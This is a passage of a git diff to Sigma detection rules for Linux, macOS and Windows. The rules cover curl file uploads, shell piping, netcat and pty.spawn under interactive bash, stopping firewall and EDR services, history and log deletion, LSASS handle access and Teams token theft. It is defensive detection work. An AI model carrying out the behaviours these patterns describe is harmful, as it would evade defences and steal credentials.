'/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml @@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml @@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml @@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..7b1778780 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Services +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: experimental +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..c47d62511 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -0,0 +1,37 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: experimental +description: Detects a suspicious curl process start the adds a file to a web request +author: Nasreddine Bencherchali +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -F ' + - ' --form' # Also covers the "--form-string" + - ' -T ' + - ' --upload-file ' + - ' -d ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + condition: selection +falsepositives: + - Scripts created by developers and admins +level: medium +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..f38914616 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml @@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: experimental +description: Detects a suspicious curl process start on linux with set useragent options +author: Nasreddine Bencherchali +references: + - https://curl.se/docs/manpage.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 3727dee7e..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -4,23 +4,31 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -4,23 +4,32 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth @@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml @@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml @@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security @@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security @@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..cc71a77b0 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/27 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -64,12 +64,18 @@ detection: - C:\Windows\SysWow64\ - C:\Windows\SysNative\ - C:\Program Files\ + - C:\Program Files (x86)\ - C:\Windows\Temp\asgard2-agent\ - C:\ProgramData\Microsoft\Windows Defender\Platform\ filter2: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: + - '0x10' + - '0x1410' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml new file mode 100644 index 000000000..e19c134ff --- /dev/null +++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml @@ -0,0 +1,27 @@ +title: Suspicious Teams Application Related ObjectAcess Event +id: 25cde13e-8e20-4c29-b949-4e795b76f16f +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4663 + ObjectName|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + ProcessName|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index e1cdc5070..aa7d64829 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -6,13 +6,13 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj date: 2022/08/02 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index 6c202bf1c..5e2c4ddce 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -6,13 +6,13 @@ references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali date: 2022/08/03 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml new file mode 100644 index 000000000..fd5cdf40b --- /dev/null +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -0,0 +1,28 @@ +title: Failed Mounting of Hidden Share +id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb +description: Detects repeated failed (outgoing) attempts to mount a hidden share +author: Fabian Franz +status: experimental +level: medium +references: + - https://twitter.com/moti_b/status/1032645458634653697 + - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +date: 2022/08/30 +modified: 2022/08/30 +logsource: + product: windows + service: smbclient-security +detection: + selection: + EventID: 31010 + ShareName|endswith: '$' + timeframe: 1m + condition: selection | count() > 10 +fields: + - ShareName +falsepositives: + - Legitimate administrative activity + - Faulty scripts +tags: + - attack.t1021.002 + - attack.lateral_movement diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..8acfb3fce 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -1,9 +1,9 @@ -title: Suspicious Ldap Domain Access +title: Suspicious LDAP Domain Access id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e -description: Detect suspicious ldap request from non Windows application +description: Detect suspicious LDAP request from non-Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/21 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -16,10 +16,15 @@ detection: filter_windows: Image|startswith: 'C:\Windows\' filter_defender: - Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + Image|startswith: + - 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + - 'C:\Program Files\Windows Defender\MsMpEng.exe' + - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe' Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..64ea228a5 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -4,22 +4,24 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection and not 1 of filter_* falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml new file mode 100644 index 000000000..332a8a19c --- /dev/null +++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml @@ -0,0 +1,26 @@ +title: Suspicious File Event With Teams Objects +id: 6902955a-01b7-432c-b32a-6f5f81d8f624 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 4c07b444c..4f1bf73ac 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ author: Teymur 